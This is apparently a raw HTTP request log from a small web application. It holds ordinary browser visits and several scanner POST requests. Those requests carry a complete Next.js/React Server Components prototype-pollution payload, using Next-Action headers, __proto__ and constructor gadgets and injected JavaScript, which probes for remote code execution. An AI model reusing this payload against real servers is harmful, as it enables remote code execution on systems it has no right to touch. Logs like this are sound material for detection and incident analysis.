Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /login
URL: /login
Method: GET
[2026-03-13 10:44:53] === HTTP Request ===
[2026-03-13 10:44:51] Main page accessed - IP: 172.30.0.12:36472
===================
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 1.1 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
X-Forwarded-For: 178.141.77.200
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /
URL: /
Method: GET
[2026-03-13 10:44:51] === HTTP Request ===
[2026-03-13 10:44:51] Main page accessed - IP: 172.30.0.12:36472
===================
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "Windows"
X-Forwarded-For: 178.141.77.200
Sec-Ch-Ua-Mobile: ?0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /
URL: /
Method: GET
[2026-03-13 10:44:51] === HTTP Request ===
[2026-03-13 10:44:38] Login page accessed - IP: 178.141.77.200:58383
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:58383
Path: /login
URL: /login
Method: GET
[2026-03-13 10:44:38] === HTTP Request ===
===================
X-Forwarded-For: 178.141.77.200
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/cabinet?user=20
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Via: 1.1 Caddy
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-Proto: https
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-13 10:43:11] === HTTP Request ===
[2026-03-13 10:43:11] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:36472
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Sec-Fetch-Site: same-origin
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "Windows"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 178.141.77.200
Via: 1.1 Caddy
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-03-13 10:43:11] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br, zstd
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Forwarded-For: 178.141.77.200
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: image
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 10:43:05] === HTTP Request ===
[2026-03-13 10:43:05] Login page accessed - IP: 172.30.0.12:36472
===================
X-Forwarded-For: 178.141.77.200
Sec-Fetch-Dest: document
Referer: https://admin.vulnberries.ru/
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /login
URL: /login
Method: GET
[2026-03-13 10:43:05] === HTTP Request ===
===================
X-Forwarded-For: 178.141.77.200
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Sec-Fetch-Mode: no-cors
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-13 10:43:05] === HTTP Request ===
===================
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.141.77.200
Via: 1.1 Caddy
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-13 10:43:05] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/
Accept: text/css,*/*;q=0.1
X-Forwarded-For: 178.141.77.200
Via: 1.1 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: style
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-13 10:43:04] === HTTP Request ===
[2026-03-13 10:43:04] Main page accessed - IP: 172.30.0.12:36472
===================
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: cross-site
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 178.141.77.200
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Path: /
URL: /
Method: GET
[2026-03-13 10:43:04] === HTTP Request ===
[2026-03-13 10:42:32] Login page accessed - IP: 178.141.77.200:58383
===================
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:58383
Path: /login
URL: /login
Method: GET
[2026-03-13 10:42:32] === HTTP Request ===
[2026-03-13 10:42:31] Login page accessed - IP: 178.141.77.200:58383
===================
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:58383
Path: /login
URL: /login
Method: GET
[2026-03-13 10:42:31] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:58383
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-13 10:42:30] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:62304
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-13 10:42:30] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:54738
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-13 10:42:30] === HTTP Request ===
[2026-03-13 10:42:29] Main page accessed - IP: 178.141.77.200:54738
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:54738
Path: /
URL: /
Method: GET
[2026-03-13 10:42:29] === HTTP Request ===
===================
------WebKitFormBoundaryx8702577289--
------WebKitFormBoundaryx8702577289
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx8702577289
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 2088+true+4167901;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx8702577289
X-Nextjs-Html-Request-Id: ilovepoop_8702577289
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 508
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8702577289
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:58036
Path: /api/route
URL: /api/route
Method: POST
[2026-03-13 09:46:54] === HTTP Request ===
===================
------WebKitFormBoundaryx34592014121--
------WebKitFormBoundaryx34592014121
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx34592014121
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 14510+true+2384012;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx34592014121
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_34592014121
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx34592014121
Content-Length: 513
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:58028
Path: /app
URL: /app
Method: POST
[2026-03-13 09:46:54] === HTTP Request ===
===================
------WebKitFormBoundaryx221488990171--
------WebKitFormBoundaryx221488990171
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx221488990171
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 330477+true+670210;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx221488990171
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_221488990171
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx221488990171
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:58012
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-13 09:46:54] === HTTP Request ===
===================
------WebKitFormBoundaryx343335815389--
------WebKitFormBoundaryx343335815389
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx343335815389
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 102618+true+3345766;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx343335815389
Next-Action: x
Content-Length: 518
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_343335815389
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx343335815389
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:58004
Path: /api
URL: /api
Method: POST
[2026-03-13 09:46:54] === HTTP Request ===
===================
------WebKitFormBoundaryx408942278995--
------WebKitFormBoundaryx408942278995
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx408942278995
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 66414+true+6157471;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx408942278995
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx408942278995
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_408942278995
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:58002
Path: /_next
URL: /_next
Method: POST
[2026-03-13 09:46:54] === HTTP Request ===
[2026-03-13 09:46:54] Main page accessed - IP: 95.214.55.63:57990
===================
------WebKitFormBoundaryx288553069478--
------WebKitFormBoundaryx288553069478
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx288553069478
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 236207+true+1221611;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx288553069478
X-Nextjs-Html-Request-Id: ilovepoop_288553069478
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx288553069478
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:57990
Path: /
URL: /
Method: POST
[2026-03-13 09:46:54] === HTTP Request ===
[2026-03-13 09:46:54] Main page accessed - IP: 95.214.55.63:57988
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:57988
Path: /
URL: /
Method: GET
[2026-03-13 09:46:54] === HTTP Request ===
===================
------WebKitFormBoundaryx1356537660276--
------WebKitFormBoundaryx1356537660276
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1356537660276
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 212975+true+6369469;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1356537660276
X-Nextjs-Html-Request-Id: ilovepoop_1356537660276
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1356537660276
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:56146
Path: /api/route
URL: /api/route
Method: POST
[2026-03-13 09:20:58] === HTTP Request ===
===================
------WebKitFormBoundaryx434480335376--
------WebKitFormBoundaryx434480335376
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx434480335376
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 186125+true+2334347;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx434480335376
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx434480335376
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_434480335376
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:56134
Path: /app
URL: /app
Method: POST
[2026-03-13 09:20:56] === HTTP Request ===
===================
------WebKitFormBoundaryx1646557862689--
------WebKitFormBoundaryx1646557862689
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1646557862689
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 244392+true+6737364;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1646557862689
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1646557862689
X-Nextjs-Request-Id: poop1234
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_1646557862689
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:48812
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-13 09:20:55] === HTTP Request ===
===================
------WebKitFormBoundaryx5128664983--
------WebKitFormBoundaryx5128664983
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx5128664983
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 123303+true+41594;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx5128664983
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 508
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_5128664983
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx5128664983
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:48800
Path: /api
URL: /api
Method: POST
[2026-03-13 09:20:51] === HTTP Request ===
===================
------WebKitFormBoundaryx2330171323093--
------WebKitFormBoundaryx2330171323093
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2330171323093
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 277274+true+8403858;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2330171323093
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2330171323093
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2330171323093
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:48798
Path: /_next
URL: /_next
Method: POST
[2026-03-13 09:20:50] === HTTP Request ===
[2026-03-13 09:20:49] Main page accessed - IP: 87.121.84.57:48792
===================
------WebKitFormBoundaryx1845716504991--
------WebKitFormBoundaryx1845716504991
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1845716504991
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 216995+true+8505802;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1845716504991
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1845716504991
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1845716504991
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:48792
Path: /
URL: /
Method: POST
[2026-03-13 09:20:49] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:58558
Path: /jars
URL: /jars
